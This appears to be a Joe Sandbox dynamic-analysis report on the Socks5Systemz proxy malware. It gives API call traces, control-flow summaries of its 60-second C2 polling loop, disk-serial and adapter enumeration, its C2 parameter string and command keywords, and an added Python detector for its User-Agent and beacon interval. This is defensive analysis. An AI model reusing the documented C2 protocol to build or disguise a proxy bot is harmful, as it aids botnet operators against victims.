20813 2614ea5 __fptostr 9 API calls 20812->20813 20822 2618202 20813->20822 20815 2618226 MultiByteToWideChar 20814->20815 20816 2618219 AreFileApisANSI 20814->20816 
20818 2618251 20815->20818 20819 2618240 GetLastError 20815->20819 20816->20815 20817 2618223 20816->20817 20817->20815 20821 2618a64 __malloc_crt 59 API calls 20818->20821 20820 2615dea __dosmaperr 59 API calls 20819->20820 20820->20822 20823 2618259 20821->20823 20822->20802 20823->20822 20824 2618260 MultiByteToWideChar 20823->20824 20824->20822 20825 2618276 GetLastError 20824->20825 20826 2615dea __dosmaperr 59 API calls 20825->20826 20827 2618282 20826->20827 20828 2612f24 _free 59 API calls 20827->20828 20828->20822 20829->20805 20831 2619820 20830->20831 20832 261983f RtlLeaveCriticalSection 20830->20832 20831->20832 20833 2619827 20831->20833 20832->20748 20836 2618a07 RtlLeaveCriticalSection 20833->20836 20835 261983c 20835->20748 20836->20835 20838 26197b2 20837->20838 20839 26197d4 RtlEnterCriticalSection 20837->20839 20838->20839 20840 26197ba 20838->20840 20841 26138fe 20839->20841 20842 261889d __lock 59 API calls 20840->20842 20843 261375d 20841->20843 20842->20841 20845 261376c 20843->20845 20850 261378a 20843->20850 20844 261377a 20846 2615e0b __fptostr 59 API calls 20844->20846 20845->20844 20845->20850 20853 26137a4 _memmove 20845->20853 20847 261377f 20846->20847 20848 2614ea5 __fptostr 9 API calls 20847->20848 20848->20850 20849 2615eb1 __flsbuf 79 API calls 20849->20853 20855 2613930 20850->20855 20852 2619de1 __filbuf 59 API calls 20852->20853 20853->20849 20853->20850 20853->20852 20854 2619e05 __write 79 API calls 20853->20854 20858 261a79f 20853->20858 20854->20853 20856 2619811 __fsopen 2 API calls 20855->20856 20857 2613936 20856->20857 20857->20674 20859 261a7b2 20858->20859 20863 261a7d6 20858->20863 20860 2619de1 __filbuf 59 API calls 20859->20860 20859->20863 20861 261a7cf 20860->20861 20862 2619e05 __write 79 API calls 20861->20862 20862->20863 20863->20853 20865 26139d7 20864->20865 20866 26139eb 20864->20866 20867 2615e0b __fptostr 59 API calls 20865->20867 20868 26139e7 20866->20868 20870 261a79f __flush 79 API calls 
Call graph (data for the rendered executed-functions graph; the node IDs and edge pairs are layout data and are dropped here, the nodes that carry API calls are kept, grouped by region):

Runtime startup and CRT in the original image (0x401000 region):
  402ef0 GetVersion; 404034 HeapCreate; 40407e HeapDestroy; 402f64 GetCommandLineA; 402f88 / 403d33 GetStartupInfoA; 402f9a / 403ebf GetModuleHandleA; 403e12 / 403e79 GetFileType; 403e6b / 4043da GetStdHandle; 403eab SetHandleCount; 403bfd / 403c3d GetEnvironmentStringsW; 403c11 / 403cc3 GetEnvironmentStrings; 403caf FreeEnvironmentStringsW; 403d00 FreeEnvironmentStringsA; 403f2f GetEnvironmentVariableA; 4039ac / 403f93 / 4042fc GetModuleFileNameA; 402d8c GetVersionExA; 4043da WriteFile; 403835 UnhandledExceptionFilter; 403659 GetCurrentProcess, TerminateProcess; 403022 / 4036d4 ExitProcess; 4065c5 LoadLibraryA; 4065d6 / 4065ed GetProcAddress; 405e73 / 40606f GetCPInfo; 405fd9 GetOEMCP; 405fee GetACP; 40677f / 406873 GetStringTypeW; 40679b / 4067c2 GetStringTypeA; 4067fc / 40685a / 40695f / 4069bf MultiByteToWideChar; 403c49 / 403c8c / 406a89 WideCharToMultiByte; 4068c7 / 4069d8 / 406a07 / 406a71 LCMapStringW; 4068eb / 40692c LCMapStringA.
  Allocator routines: 4030d0 / 404af3 / 404c70 HeapAlloc; 404ac3 HeapReAlloc; 403139 / 40472b / 404b33 / 404d8a / 404dcd HeapFree; 402810 / 404b19 / 404b73 / 404c8d / 404cad / 40504e VirtualAlloc; 4046b8 / 40472b / 404d74 / 404da0 / 404e24 VirtualFree.

Host enumeration in the original image:
  401a4f CreateFileA -> 401a98 DeviceIoControl -> 401b0e GetLastError -> 401b3a FindCloseChangeNotification (in kernel32 this export shares its address with CloseHandle, so the call is the close of the device handle opened by CreateFileA).
  401b4b LoadLibraryA -> 401b6e GetProcAddress -> 401b95 GetAdaptersInfo -> 401c18 FreeLibrary (GetAdaptersInfo lives in iphlpapi.dll and is resolved at run time rather than imported).
  40d3c6 GetLocalTime; 40daa7 LoadLibraryExA; 4022d9 Sleep.

Unpacked code at 0x2601000 (the region the control-flow graphs below are taken from):
  2606487 RtlInitializeCriticalSection, GetModuleHandleA, GetProcAddress, GetModuleHandleA, GetProcAddress -> 26064ef GetTickCount; 260104d -> 2601aa9 InterlockedIncrement -> 2601ac5 WSAStartup, InterlockedExchange; 260f851 CreateFileA -> 260f89a DeviceIoControl -> 260f90f GetLastError -> 260f943 FindCloseChangeNotification (same CloseHandle alias as above); 2681c30 CreateFileA; 263f370 / 26922d0 WriteFile; 265f7b0 FindCloseChangeNotification.
  Statically linked CRT in the same region (__fsopen, __filbuf, __commit, ___lock_fhandle, __dosmaperr, __cinit, _Allocate, _malloc, _free): 261b1ff CloseHandle; 261b20b GetLastError; 2620ec5 SetStdHandle; 2620fe0 RtlLeaveCriticalSection.

                                                                                      Control-flow Graph
                                                                                      (rendered graph; the basic blocks that carry API or library calls are listed in the order the polling loop executes them, with the block address ranges from the graph data)
                                                                                      • 2606704: Sleep (0xEA60 = 60 000 ms, the delay between two polls)
                                                                                      • 260670a-260673e: RtlEnterCriticalSection, RtlLeaveCriticalSection
                                                                                      • 2606768-260678c: _memset ×2
                                                                                      • 26072a7-26072bf: InternetOpenA (the User-Agent from the string list below)
                                                                                      • 26072c5-2607319: InternetSetOptionA ×3 (option 2 = INTERNET_OPTION_CONNECT_TIMEOUT, value not captured; options 5 and 6 = INTERNET_OPTION_SEND_TIMEOUT and INTERNET_OPTION_RECEIVE_TIMEOUT, both 0x1388 = 5 000 ms), _memset
                                                                                      • 260731e-260733c: InternetOpenUrlA (flags 0x04000200 = INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_UI); on failure the path goes straight to the session close at 260737e
                                                                                      • 2607342-2607368: InternetReadFile into a 0x1000-byte buffer, looping (260736a -> 2607342) until the read loop ends
                                                                                      • 2607373-260737a, 260737e-260737f: InternetCloseHandle for the request handle, then for the session handle
                                                                                      • 2607399-26073a6: call 26053ec (unsymbolised); 26073bb-26073df: _memset, call 260439c
                                                                                      • 26073e5-2607413 and the chain 2607415 / 2607429 / 260743d / 2607451 / 2607469 / 260754a / 260773e / 2607799 / 26077cc / 2607afc: RtlEnterCriticalSection, RtlLeaveCriticalSection, then repeated calls to 26122ec (a dispatch over the response; 26122ec is not symbolised in the dump)
                                                                                      • 2607492-2607544: _malloc, RtlEnterCriticalSection, RtlLeaveCriticalSection, _memset ×5, call 260439c ×2
                                                                                      • 2607585-26075b3: _malloc, _memset, call 260439c
                                                                                      • 26075b5-26075f2: _strtok, _swscanf, _strtok in a loop (the "%d;" string below is the scan format); 26075f4-26075fd: _free
                                                                                      • 2607603-26076cb: _Allocate (2613afc) and the unsymbolised calls 26096e5, 260a7fd, 2603863, 2605119, 260aaa3, 260abbd
                                                                                      • 26076e8-26076f7: Sleep (0x7D0 = 2 000 ms), then call 26118a0 and, on one branch, 2604100 / 260380b
                                                                                      • 2607756-2607794: _memset, RtlEnterCriticalSection, RtlLeaveCriticalSection
                                                                                      • 26077ad-26077c7: calls 26061f1, 26062ff, 260640a; 26077ec-2607803: call 260439c
                                                                                      • 2607809-26078d7: _sprintf (26123c8), call 2601ba7; 26078de-26078ff / 260790b-2607941: RtlEnterCriticalSection / RtlLeaveCriticalSection on a second lock, then 2603c67, 2603d7e, 26082e9
                                                                                      • 2607975-2607aac: calls 260a6d3 (×3) and 260d0c5; 2607aad-2607ade: 2608398, 26033b2; 2607ae3-2607af7: 2608fb1
                                                                                      • 2607b14-2607b52: _malloc, _memset, call 260439c, then either 260534d or _free
                                                                                      All exits return to the loop head at 26066f0.
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(0000EA60), ref: 02606704
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 0260670F
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 02606720
                                                                                      • _memset.LIBCMT ref: 02606775
                                                                                      • _memset.LIBCMT ref: 02606784
                                                                                      • InternetOpenA.WININET(?), ref: 026072B1
                                                                                      • InternetSetOptionA.WININET(00000000,00000002,?), ref: 026072D9
                                                                                      • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 026072F1
                                                                                      • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02607309
                                                                                      • _memset.LIBCMT ref: 02607319
                                                                                      • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02607332
                                                                                      • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02607354
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02607374
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0260737F
                                                                                      • _memset.LIBCMT ref: 026073C7
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 026073EA
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 026073FB
                                                                                      • _malloc.LIBCMT ref: 02607494
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 026074A6
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 026074B2
                                                                                      • _memset.LIBCMT ref: 026074CC
                                                                                      • _memset.LIBCMT ref: 026074DB
                                                                                      • _memset.LIBCMT ref: 026074EB
                                                                                      • _memset.LIBCMT ref: 026074FE
                                                                                      • _memset.LIBCMT ref: 02607514
                                                                                      • _malloc.LIBCMT ref: 0260758A
                                                                                      • _memset.LIBCMT ref: 0260759B
                                                                                      • _strtok.LIBCMT ref: 026075BB
                                                                                      • _swscanf.LIBCMT ref: 026075D2
                                                                                      • _strtok.LIBCMT ref: 026075E9
                                                                                      • _free.LIBCMT ref: 026075F5
                                                                                      • Sleep.KERNEL32(000007D0), ref: 026076ED
                                                                                      • _memset.LIBCMT ref: 02607761
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 0260776E
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 02607780
                                                                                      • _sprintf.LIBCMT ref: 0260781E
                                                                                      • RtlEnterCriticalSection.NTDLL(00000020), ref: 026078E2
                                                                                      • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02607916
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      • API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                                      • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                                        (the `$` is the separator: "%d;", "<htm", the User-Agent "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)", and the keywords auth_ip, auth_swith, block, connect, disconnect, idle, updips, updurls, urls)
                                                                                      • API String ID: 696907137-1839899575
                                                                                      • Opcode ID: 262c02870666d54ac191bbce90b7da178b3802a36d03c2f62581e797092f6ee3
                                                                                      • Instruction ID: 7f31793c3411e325bee8d9ec0bd698fe17b8ffd0c299e82dbfd48472c2b84461
                                                                                      • Opcode Fuzzy Hash: 262c02870666d54ac191bbce90b7da178b3802a36d03c2f62581e797092f6ee3
                                                                                      • Instruction Fuzzy Hash: 1632E0715483819FE73AAF64DC84BAFBBE6AF85310F14081DF589972D0DB70A408DB5A
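The API list and string set above pin down the polling loop: a fixed User-Agent, 5 000 ms WinINet timeouts, one InternetOpenUrlA per iteration and Sleep(0xEA60) = 60 s between iterations. The Python script below is an added example, not part of the Joe Sandbox report and not code from the sample, showing how a detection engineer would turn those two facts into proxy-log checks: an exact match on the User-Agent, which is a strong indicator on its own because "Windows NT 9.0" is not a version string any Windows build emits, and a periodicity check for requests from one client to one URL at roughly 60 s intervals. The log format, host names, addresses, tolerance and minimum-series values are constructed for the example; the second client in the sample log is a benign updater that also polls every 60 s, included to show that the periodicity check alone only triages, while the User-Agent match confirms.

```python
"""Proxy-log checks for the Socks5Systemz polling loop described above.

Added example for this report; the log format and all hosts and addresses
below are constructed and do not come from the analysed sample.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# User-Agent recovered from the dump (String ID above). "Windows NT 9.0" does
# not exist, so an exact match is a high-confidence indicator on its own.
SOCKS5SYSTEMZ_UA = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"

# Sleep(0xEA60) = 60 000 ms between polls. Each WinINet timeout is 0x1388 =
# 5 000 ms, so a failing poll can stretch one interval by up to ~15 s.
BEACON_PERIOD = timedelta(seconds=60)
BEACON_TOLERANCE = timedelta(seconds=15)  # assumed; tune to the environment
MIN_REQUESTS = 4                          # assumed minimum series length

# Constructed log format: <iso-timestamp> <client> <method> <url> <status> "<ua>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+'
    r'(?P<status>\d{3})\s+"(?P<ua>[^"]*)"\s*$'
)

# Constructed sample: 10.0.0.5 polls with the sample's User-Agent about every
# 60 s, 10.0.0.9 is a benign updater that also polls every 60 s, 10.0.0.7 is
# ordinary browsing. Lines are deliberately not in time order.
SAMPLE_LOG = """\
2024-06-13T10:00:00Z 10.0.0.5 GET http://c2.example.invalid/api/?a=1 200 "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
2024-06-13T10:00:07Z 10.0.0.7 GET http://www.example.invalid/ 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-06-13T10:01:01Z 10.0.0.5 GET http://c2.example.invalid/api/?a=1 200 "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
2024-06-13T10:01:30Z 10.0.0.7 GET http://www.example.invalid/news 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-06-13T10:02:02Z 10.0.0.5 GET http://c2.example.invalid/api/?a=1 200 "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
2024-06-13T10:03:06Z 10.0.0.5 GET http://c2.example.invalid/api/?a=1 200 "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
2024-06-13T10:04:07Z 10.0.0.5 GET http://c2.example.invalid/api/?a=1 200 "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
2024-06-13T10:00:10Z 10.0.0.9 GET http://updates.example.invalid/check 200 "UpdateAgent/1.0"
2024-06-13T10:01:10Z 10.0.0.9 GET http://updates.example.invalid/check 200 "UpdateAgent/1.0"
2024-06-13T10:02:10Z 10.0.0.9 GET http://updates.example.invalid/check 200 "UpdateAgent/1.0"
2024-06-13T10:03:10Z 10.0.0.9 GET http://updates.example.invalid/check 200 "UpdateAgent/1.0"
2024-06-13T10:04:10Z 10.0.0.9 GET http://updates.example.invalid/check 200 "UpdateAgent/1.0"
2024-06-13T10:05:10Z 10.0.0.9 GET http://updates.example.invalid/check 200 "UpdateAgent/1.0"
"""


def parse_log(text):
    """Parse log lines into dicts; malformed lines are skipped, not fatal."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        rec["status"] = int(rec["status"])
        records.append(rec)
    return records


def find_ua_hits(records):
    """Clients that sent the hard-coded User-Agent (exact match, not substring)."""
    return sorted({r["client"] for r in records if r["ua"] == SOCKS5SYSTEMZ_UA})


def find_beacons(records, period=BEACON_PERIOD, tolerance=BEACON_TOLERANCE,
                 min_requests=MIN_REQUESTS):
    """(client, url) series whose every inter-request gap is period +/- tolerance.

    Returns a dict mapping the series key to the median gap in seconds.
    """
    series = defaultdict(list)
    for r in records:
        series[(r["client"], r["url"])].append(r["ts"])
    beacons = {}
    for key, stamps in series.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()  # logs are not guaranteed to be in time order
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        if all(abs(gap - period) <= tolerance for gap in gaps):
            beacons[key] = statistics.median(g.total_seconds() for g in gaps)
    return beacons


def triage(text):
    """Per-client verdict: 'confirmed' (UA + beacon), 'ua_match', or 'periodic'."""
    records = parse_log(text)
    ua_hits = set(find_ua_hits(records))
    verdicts = {}
    for (client, _url) in find_beacons(records):
        verdicts[client] = "confirmed" if client in ua_hits else "periodic"
    for client in ua_hits:
        verdicts.setdefault(client, "ua_match")
    return verdicts


if __name__ == "__main__":
    for client, verdict in sorted(triage(SAMPLE_LOG).items()):
        print(f"{client}: {verdict}")
```

Run as a script it prints one verdict per client. The grouping key is (client, URL) because the sample's request path is fixed per build; if the operator rotates query strings, group by host instead. Keep the User-Agent check as an exact string match: the 2 000 ms sleep on the error path and the three 5 000 ms timeouts mean the beacon interval drifts, while the User-Agent does not.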

                                                                                      Control-flow Graph
                                                                                      (rendered graph; the initialisation routine that precedes the polling loop, basic blocks with API or library calls in execution order, with the block address ranges from the graph data)
                                                                                      • 2606487-26064e8: RtlInitializeCriticalSection; GetModuleHandleA("ntdll.dll") + GetProcAddress for "sprintf", then GetModuleHandleA("ntdll.dll") + GetProcAddress for "strcat" (both resolved from ntdll at run time instead of being imported)
                                                                                      • 26064ea: call 26042c7 (unsymbolised, taken on one branch only)
                                                                                      • 26064ef-26066ed: GetTickCount; call 260605a (wraps _malloc); GetVersionExA; _memset; _malloc ×8; GetProcessHeap + RtlAllocateHeap ×3 (sizes 4, 0x400, 0x400); _memset ×3; RtlEnterCriticalSection, RtlLeaveCriticalSection; _malloc ×4; QueryPerformanceCounter; Sleep; _malloc ×2; _memset ×2
                                                                                      • 26066f0-26066f2: head of the main loop; 2606704: Sleep (0xEA60 = 60 000 ms); 260670a-260673e: RtlEnterCriticalSection, RtlLeaveCriticalSection; 2606768-260678c: _memset ×2
                                                                                      • 2606792-26072bf: InternetOpenA, from where the blocks are those of the polling routine shown in the previous graph (InternetSetOptionA ×3, InternetOpenUrlA, InternetReadFile loop, InternetCloseHandle ×2, response parsing with _strtok / _swscanf, Sleep 0x7D0, _sprintf), all of whose exits return to 26066f0
                                                                                      APIs
                                                                                      • RtlInitializeCriticalSection.NTDLL(026371D8), ref: 026064B6
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 026064CD
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 026064D6
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 026064E5
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 026064E8
                                                                                      • GetTickCount.KERNEL32 ref: 026064F4
                                                                                        • Part of subcall function 0260605A: _malloc.LIBCMT ref: 02606068
                                                                                      • GetVersionExA.KERNEL32(02637030), ref: 02606521
                                                                                      • _memset.LIBCMT ref: 02606540
                                                                                      • _malloc.LIBCMT ref: 0260654D
                                                                                        • Part of subcall function 02612F5C: __FF_MSGBANNER.LIBCMT ref: 02612F73
                                                                                        • Part of subcall function 02612F5C: __NMSG_WRITE.LIBCMT ref: 02612F7A
                                                                                        • Part of subcall function 02612F5C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 02612F9F
                                                                                      • _malloc.LIBCMT ref: 0260655D
                                                                                      • _malloc.LIBCMT ref: 02606568
                                                                                      • _malloc.LIBCMT ref: 02606573
                                                                                      • _malloc.LIBCMT ref: 0260657E
                                                                                      • _malloc.LIBCMT ref: 02606589
                                                                                      • _malloc.LIBCMT ref: 02606594
                                                                                      • _malloc.LIBCMT ref: 026065A3
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000004), ref: 026065BA
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 026065C3
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 026065D2
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 026065D5
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 026065E0
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 026065E3
                                                                                      • _memset.LIBCMT ref: 026065F6
                                                                                      • _memset.LIBCMT ref: 02606602
                                                                                      • _memset.LIBCMT ref: 0260660F
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 0260661D
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 0260662A
                                                                                      • _malloc.LIBCMT ref: 0260664E
                                                                                      • _malloc.LIBCMT ref: 0260665C
                                                                                      • _malloc.LIBCMT ref: 02606663
                                                                                      • _malloc.LIBCMT ref: 02606689
                                                                                      • QueryPerformanceCounter.KERNEL32(00000200), ref: 0260669C
                                                                                      • Sleep.KERNELBASE ref: 026066AA
                                                                                      • _malloc.LIBCMT ref: 026066B6
                                                                                      • _malloc.LIBCMT ref: 026066C3
                                                                                      • _memset.LIBCMT ref: 026066D8
                                                                                      • _memset.LIBCMT ref: 026066E8
                                                                                      • Sleep.KERNELBASE(0000EA60), ref: 02606704
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 0260670F
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 02606720
                                                                                      • _memset.LIBCMT ref: 02606775
                                                                                      • _memset.LIBCMT ref: 02606784
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                      • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                      • API String ID: 2251652938-2678694477
                                                                                      • Opcode ID: e19cab9bd5923c276dcf071d0aabfc98243b41e192cc2a2a7e666422092eefdf
                                                                                      • Instruction ID: 652079d114c61dca50e16751eabd89fd554770d84aec6dbb73c38f876a5bba69
                                                                                      • Opcode Fuzzy Hash: e19cab9bd5923c276dcf071d0aabfc98243b41e192cc2a2a7e666422092eefdf
                                                                                      • Instruction Fuzzy Hash: 3E71C1B1D88350AFE3216F349C49B1FBBE8AF45310F15481DF98997290DBB46849CF9A

                                                                                      Control-flow Graph: function at 00401B4B (LoadLibraryA, GetProcAddress, GetAdaptersInfo, FreeLibrary); the rendered graph and its executed/not-executed legend are not reproduced here
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                      • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                      • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                      • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                      • API String ID: 514930453-3667123677
                                                                                      • Opcode ID: a3c77d1947fac9ed500e02c632cb5410261389502922d6f95d8c76429a6c9e05
                                                                                      • Instruction ID: 2fcbbae68a7f2e143e0ba6fa3878dab2488d9b05c73812711a2b91e8578584ab
                                                                                      • Opcode Fuzzy Hash: a3c77d1947fac9ed500e02c632cb5410261389502922d6f95d8c76429a6c9e05
                                                                                      • Instruction Fuzzy Hash: E521A770904109AEEF119B65CD447EF7BB8EF41344F1440BAD504B22E1E7789985CB69

                                                                                      Control-flow Graph: function at 0260F955 (LoadLibraryA, GetProcAddress, GetAdaptersInfo, FreeLibrary); the rendered graph and its executed/not-executed legend are not reproduced here
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 0260F96B
                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 0260F984
                                                                                      • GetAdaptersInfo.IPHLPAPI(?,?), ref: 0260F9A9
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0260FA32
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                      • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                      • API String ID: 514930453-3114217049
                                                                                      • Opcode ID: d51c55967de2a6bfe1431d036b7386641341cf89dc8b99104b1b6d6762f50e73
                                                                                      • Instruction ID: d15d6107f63c4fb730845c2c6f89d1ec04e66c86d0b96fc8dcbb335f7ff44327
                                                                                      • Opcode Fuzzy Hash: d51c55967de2a6bfe1431d036b7386641341cf89dc8b99104b1b6d6762f50e73
                                                                                      • Instruction Fuzzy Hash: 0221B471E00209ABDB29CBA9D8C4AEFBBF8AF05310F1440A9E405E7791DF309945DBA4

                                                                                      Control-flow Graph: function at 0260F851 (CreateFileA, DeviceIoControl, GetLastError, FindCloseChangeNotification); the rendered graph and its executed/not-executed legend are not reproduced here
                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 0260F870
                                                                                      • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 0260F8AE
                                                                                      • GetLastError.KERNEL32 ref: 0260F90F
                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0260F946
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                      • String ID: \\.\PhysicalDrive0
                                                                                      • API String ID: 3786717961-1180397377
                                                                                      • Opcode ID: 17c0ac5f84ec47e831fe8554c1477fc74aa8f44433f2a3d3825f5947da5b3476
                                                                                      • Instruction ID: d5063f03daca64425f8dbf5a1d91700505b5d6fffa4e0c42bc4e442316cf17e2
                                                                                      • Opcode Fuzzy Hash: 17c0ac5f84ec47e831fe8554c1477fc74aa8f44433f2a3d3825f5947da5b3476
                                                                                      • Instruction Fuzzy Hash: 13319071E00219EBDB38CFA4C884EEFBBB9FF05714F24416AE515A7680DB705A05EB94

                                                                                      Control-flow Graph: function at 00401A4F (CreateFileA, DeviceIoControl, GetLastError, FindCloseChangeNotification); the rendered graph and its executed/not-executed legend are not reproduced here
                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                      • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                      • GetLastError.KERNEL32 ref: 00401B0E
                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                      • String ID: \\.\PhysicalDrive0
                                                                                      • API String ID: 3786717961-1180397377
                                                                                      • Opcode ID: 87e5aa96cf8bbfa53ba141c063bc04efd036a70200bde10c5f99651d25558048
                                                                                      • Instruction ID: 04828827cee311aa1ccd055820d70034eb57b3ddca3c9d8c28a7d5788a1782d0
                                                                                      • Opcode Fuzzy Hash: 87e5aa96cf8bbfa53ba141c063bc04efd036a70200bde10c5f99651d25558048
                                                                                      • Instruction Fuzzy Hash: 43318D71D00118EADB21AFA5CD849EFBBB9FF41750F20407AE554B22A0E7785E45CB98
